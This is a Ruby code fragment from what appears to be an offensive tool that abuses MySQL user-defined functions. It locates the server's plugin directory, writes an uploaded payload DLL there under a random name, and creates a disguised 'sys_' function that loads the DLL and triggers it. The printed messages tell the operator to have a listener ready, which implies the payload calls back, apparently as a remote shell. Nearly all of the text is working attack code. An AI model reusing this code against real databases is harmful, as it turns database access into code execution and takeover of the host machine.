# Code Snippet continuation, by HR
# Determine Plugin Directory
# This is where we need to write UDF to
# Pass in the MySQL connection object (dbc)
def get_plugin_dir(dbc)
begin
q = dbc.query(\'SELECT @@plugin_dir;\')
q.each { |x| @pdir=x[0]; }
if @pdir.nil?
q = dbc.query("SHOW VARIABLES LIKE \'basedir\';")
q.each { |x| @pdir=x[1]; }
plugpath = @pdir.split("\\\\").join("\\\\\\\\")
plugpath += "\\\\\\\\lib\\\\\\\\plugin\\\\\\\\"
else
plugpath = @pdir.split("\\\\").join("\\\\\\\\")
plugpath += "\\\\\\\\"
end
return plugpath
rescue Mysql::Error => e
puts "Problem determining the plugins directory!"
puts "\\t=> #{e}"
puts "Sorry, can\'t continue without this piece....\\n\\n"
exit 666;
end
end
# Create new function tied to custom DLL
# Once created (and called) it should trigger the DLL payload
def create_custom_function(dbc, file)
dll_name = randz(15) + ".dll"
plugin_path = get_plugin_dir(dbc)
@udf_dest = plugin_path.chomp + dll_name
fake_function = \'sys_\' + randz(5)
# Upload our UDF DLL Payload file
if write_bin_file(dbc, file, @udf_dest)
begin
puts "Payload DLL writen to disk!"
puts "Creating function to trigger now...."
puts "Make sure your listener is ready...."
sleep(3)
# Drop function if its already there, then create new
q = dbc.query("DROP FUNCTION IF EXISTS #{fake_function};")
q = dbc.query("CREATE FUNCTION #{fake_function} RETURNS string SONAME \'#{dll_name}\';")
return fake_function
rescue Mysql::Error => e
puts "Error Triggered, Payload should have also been triggered!"
return fake_function
end
end
end